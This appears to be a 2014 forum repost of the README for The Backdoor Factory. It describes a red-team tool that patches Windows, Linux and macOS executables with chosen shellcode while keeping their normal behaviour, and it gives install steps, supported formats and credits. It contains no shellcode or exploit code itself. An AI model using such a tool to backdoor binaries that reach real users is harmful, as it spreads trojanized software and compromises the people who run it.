The Backdoor Factory (BDF)

Nytro · November 25, 2014

[h=2]The Backdoor Factory (BDF)[/h] For security professionals and researchers only.

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

DerbyCon 2014 Presentation:

Contact the developer on:

IRC:

irc.freenode.net #BDFactory

Twitter: @Midnite_runr

Under a BSD 3 Clause License

See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki

Dependences:

Capstone, using the 'next' repo until it is the 'master' repo: https://github.com/aquynh/capstone/tree/next

Pefile, most recent: https://code.google.com/p/pefile/

INSTALL:

./install.sh

This will install Capstone with the 'next' repo and use pip to install pefile.

UPDATE:

./update.sh

Supporting:

Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32),

and Mach-O x86/x64 and those formats in FAT files

Packed Files: PE UPX x86/x64

Experimental: OpenBSD x32

Some executables have built in protections, as such this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises. I'm on the verge of bypassing NSIS, so bypassing these checks will be included in the future.

Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--

Without him, I would still be trying to do stupid things

with the elf format.

Also thanks to Silvio Cesare with his 1998 paper

(Silvio Cesare 'Unix ELF parasites and virus' (VX heaven)) which these ELF patching

techniques are based on.

From DerbyCon:

Video: